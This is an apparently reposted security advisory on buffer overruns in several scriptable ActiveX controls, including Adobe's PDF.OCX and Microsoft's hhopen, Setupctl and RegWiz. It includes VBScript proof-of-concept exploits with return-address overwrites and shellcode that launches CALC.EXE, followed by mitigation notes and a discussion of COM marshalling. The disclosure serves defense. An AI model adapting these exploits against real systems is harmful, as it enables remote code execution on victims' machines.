Win systems
Shane Hird found following. This advisory outlines several buffer
overruns in several controls, and the vulnerability of ActiveX
controls to buffer overrun attacks in general. It appears that
the ActiveX/OLE/COM technology in general does no buffer checks
before passing parameters to controls, leaving the checking
up to the control in question. Hence, many poorly written
controls are individually susceptible to buffer overrun attacks,
independent of the environment they are controlled from, and other
controls on the system. The following controls are probably just
a few of the vulnerable controls which are in common use,
including one control from a third party vendor (Adobe). Because
these controls are marked as safe for scripting, they may be
exploited through IE through a web page, E-mail, or anywhere else
where 'safe' ActiveX controls may be scripted (ie some newsgroup
readers and other E-mail clients).
Known Affected Controls:
Acrobat Control for ActiveX - PDF.OCX v1.3.188
Setupctl 1.0 Type Library - SETUPCTL.DLL v1, 1, 0, 6
EYEDOG OLE Control module - EYEDOG.OCX v1.1.1.75
MSN ActiveX Setup BBS Control - SETUPBBS.OCX v4.71.0.10
hhopen OLE Control Module - HHOPEN.OCX v1, 0, 0, 1
RegWizCtrl 1.0 Type Library - REGWIZC.DLL v3, 0, 0, 0
Each control contains at least one method, which does incorrect
handling of strings, and when manipulating a string too large, a
classic buffer overrun can occur, allowing arbitrary code to be
executed on the client.
For each exploit, we have full control of the RET address, knowing
where to RET to in order to execute our code is easier for some
controls than others. For the controls where no known fixed or
referenced location of the code can be found, we will simply RET
to ExitProcess, although it is still possible but more difficult
to execute arbitrary code. For the exploits which are easy to RET
to the code, we will demonstrate how to execute a program
(CALC.EXE) using fixed API locations in Win98, you will need to
modify these addresses depending on the versions in use. For the
exploits, similar to a couple other Win exploits, a JMP ESP
is required to get to the code. Shane didn't manage to find one
in Kernel32 or IExplore, however there does appear to be one in
Shell32 (version 4.72.3110.6) at (7FD035EB), you will also need
to modify this address depending on your version. So if you get a
crash at around this address, then it is most likely possible to
run the exploit, the address just needs to be changed. It should
be noted that arbitrary code may be executed, not just running a
program, this is just an example. Also, Shane didn't try posting
HTML to this forum before, so hopefully it will turn out ok, if
not, could the moderators please convert the HTML to plaintext or
With this control, MSInfoLoadFile is the offending method. There
is no easy way to RET to our code, so instead, we will show how to
simply RET to ExitProcess directly. This will cause the host to
<object classid="clsid:06A7EC63-4E21-11D0-A112-00A0C90543AA"id="eye"></object>
<script language="vbscript">
msgbox("EYEDOG OLE Control module Buffer Overrun (Local Version)" + Chr(10) + "Written by Shane Hird")
'Padding for the exploit
'RET address (ExitProcess, BFF8D4CA)
expstr = expstr + Chr(202) + Chr(212) + Chr(248) + Chr(191)
'Call exploitable method (MSInfoLoadFile)
This control is a little more difficult to exploit, as the RET
address is in the middle of the string, and once again there is
no easy way to RET to our code, so we have RET'd to ExitProcess
directly instead. In this case, OpenHelp is the vulnerable
method, and the exploit is possible when the method is called with
a valid help file, and a long Help Section.
<object classid="clsid:130D7743-5F5A-11D1-B676-00A0C9697233" id="hhopen"></OBJECT>
<script language="vbscript">
msgbox("hhopen OLE Control Module Buffer Overrun" + Chr(10) + "Written By Shane Hird")
'Where the RET address appears to be, RET to ExitProcess (BFF8D4CA)
expstr = expstr + Chr(202) + Chr(212) + Chr(248) + Chr(191)
'Extra padding to trigger the overrun
'Call exploitable method, note the valid help file
hhopen.OpenHelp "Winhlp32.hlp", expstr
When this control is initialised, it will display a prompt
notifying the user that the control is capable of modifying Mail
and News configuration etc and asks the user whether he/she wishes
the control to proceed. This control is exploitable through two
different methods, vAddNewsServer and bIsNewsServerConfigured.
Shane simply RET'd to ExitProcess with this exploit, although
there are other possibilities.
<object classid="clsid:8F0F5093-0A70-11D0-BCA9-00C04FD85AA6" id="setupbbs"></OBJECT>
<script language="vbscript">
msgbox("MSN Setup BBS Buffer Overrun" + Chr(10) + "Written by Shane Hird")
'RET address (ExitProcess BFF8D4CA)
expstr = expstr + Chr(202) + Chr(212) + Chr(248) + Chr(191)
'This buffer overrun can be triggered by either method.
'setupbbs.vAddNewsServer expstr, true
setupbbs.bIsNewsServerConfigured expstr
This control from Adobe Acrobat, can be exploited through the
setview method, and because ESP points to the address after the
RET address, we can place arbitrary code at this point and JMP to
it by RET'ing to a JMP ESP, in this case, one found in Shell32.
The code simply executes CALC.EXE then calls ExitProcess to
terminate the host without it crashing. Shane attempted to notify
Adobe of the issue, however they don't appear to have any form
of direct secure@ address.
<object classid="clsid:CA8A9780-280D-11CF-A24D-444553540000" id="pdf"></object>
<script language="VBscript">
msgbox("Adobe Acrobat OCX Buffer Overrun" + Chr(10) + "Written by Shane Hird")
expstr = expstr + Chr(235) 'Address in SHELL32, Win98 (7FD035EB) of JMP ESP
expstr = expstr + Chr(53) 'You may need to use a different address
expstr = expstr + Chr(208)
expstr = expstr + Chr(127)
'Stack is slightly trashed, but NOPs fix it up ok
expstr = expstr + Chr(144) + Chr(144) + Chr(144) + Chr(144) + Chr(144)
expstr = expstr + Chr(139) + Chr(252)
'ADD EDI, 19 (Size of code)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
'PUSH EAX (Window Style EAX = 1)
expstr = expstr + Chr(80)
'PUSH EDI (Address of command line)
expstr = expstr + Chr(87)
'MOV EDX, BFFA0960 (WinExec, Win98)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + Chr(51) + Chr(192)
expstr = expstr + Chr(80)
'MOV EDX, BFF8D4CA (ExitProcess, Win98)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
'Replace with any command + 0 (automatically appended)
expstr = expstr + "CALC.EXE"
'Call exploitable method
Apparently a control that was once used for the IE update web
site which is no longer in use, although it should still exist on
a lot of systems. With this exploit, similar to the PDF exploit,
ESP points to our code so we simply RET to the same JMP ESP in
Shell32. Also, this exploit differs in that we set a property
first (DistUnit) with the long string, then call the method
(InstallNow). Again, Sahne simply demonstrated how to execute
CALC.EXE, though any code can be executed.
<object classid="clsid:F72A7B0E-0DD8-11D1-BD6E-00AA00B92AF1" id = "setupctl"></object>
<script language="vbscript">
msgbox("Setupctl 1.0 Type Library Buffer Overrun" + Chr(10) + "Written by Shane Hird")
expstr = expstr + Chr(235) 'Address in SHELL32, Win98 (7FD035EB) of JMP ESP
expstr = expstr + Chr(53) 'You may need to use a different address
expstr = expstr + Chr(208)
expstr = expstr + Chr(127)
'NOP for debugging purposes
expstr = expstr + Chr(144)
expstr = expstr + Chr(139) + Chr(252)
'ADD EDI, 19h (Size of code)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
'PUSH EAX (Window Style EAX = 41414141)
expstr = expstr + Chr(80)
'PUSH EDI (Address of command line)
expstr = expstr + Chr(87)
'MOV EDX, BFFA0960 (WinExec, Win98)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + Chr(51) + Chr(192)
expstr = expstr + Chr(80)
'MOV EDX, BFF8D4CA (ExitProcess, Win98)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
'Replace with any command + 0 (automatically appended)
expstr = expstr + "CALC.EXE"
'Run exploit
setupctl.DistUnit = expstr
The Registration Wizard control used by Microsoft to register MS
products also contains a buffer overrun in the 'InvokeRegWizard'
method. When called with a long string, pre-pended with '/i', we
can gain control of the RET address and exploit the control in a
similar manner as the PDF control. This exploit will cause a
'Regwiz.log' file to be created in the temporary directory, and
once again will execute CALC.EXE and terminate the host.
<object classid="clsid:50E5E3D1-C07E-11D0-B9FD-00A0249F6B00" id="RegWizObj"></object>
<script language="VbScript" >
msgbox("Registration Wizard Buffer Overrun" + Chr(10) + "Written by Shane Hird")
'We overflowed to the RET point of the stack
'No NULL's allowed so ret to <JMP ESP> in Shell32
expstr = expstr & Chr(235) 'Address in SHELL32, Win98
(7FD035EB) of JMP ESP
expstr = expstr & Chr(53) 'You may need to use a
different address
expstr = expstr & Chr(208)
expstr = expstr & Chr(127)
'NOP for debugging purposes
expstr = expstr + Chr(144)
expstr = expstr + Chr(139) + Chr(252)
'ADD EDI, 19 (Size of code)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
'PUSH EAX (Window Style EAX = 41414141)
expstr = expstr + Chr(80)
'PUSH EDI (Address of command line)
expstr = expstr + Chr(87)
'MOV EDX, BFFA0960 (WinExec, Win98)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + Chr(51) + Chr(192)
expstr = expstr + Chr(80)
'MOV EDX, BFF8D4CA (ExitProcess, Win98)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
'Replace with any command + 0 (automatically appended)
expstr = expstr + "CALC.EXE"
Microsoft has been notified of these exploits around a month ago,
and is releasing a patch to revoke the hhopen, regwiz and setupctl
controls, and a previous patch has been released for Eyedog. For
the other controls, and any others found to be vulnerable, see
Microsoft knowledge base article Q240797 on how to stop an ActiveX
control from running in IE. If pain persists, disable ActiveX
scripting altogether in IE. How to Stop an ActiveX Control from
Running in Internet Explorer
Buffers passed to a COM object (or ActiveX control: it's the same
thing) are marshaled by the COM subsystem, and their size *has*
to be specified. YES, the com subsystem will marshall data sent
to/from a 'remote' COM object (be that a separate process on the
same system, or a process on a remote machine). But NO, the com
subsystem does NOT marshall data for an inproc server (i.e. any
COM object exposed as a .DLL, .OCX, or
.whatever-Microsoft-calls-them- today). If the object is loaded
into the calling processes address space, then the method and
property accesses are not marshalled. As the majority of COM
object accesses of the type we are talking about in -this- thread
are in fact inproc, then marshalling is not a factor that can be
relied upon. Anyway, object gets a buffer of that specific size,
and buffer checks are done all over the place. The most common
way of passing parameters in ActiveX controls is through BSTRs,
which include the size of the string in their first character.
There's no way to overflow a BSTR. The buffer overflows
discovered arise from a situation where the programmer extracted
the buffer from the BSTR, and put it into a simple character
array of the form: char[256], without bothering to check if the
fixed size of the character array is large enough to hold the
string. The COM architecture has nothing to do with this buffer
overflow (on the contrary: it makes it very difficult for
programmers to create buffer overflows.
Clarification -- if the caller and the object are in different
apartments -- even within the same process -- marshaling occurs.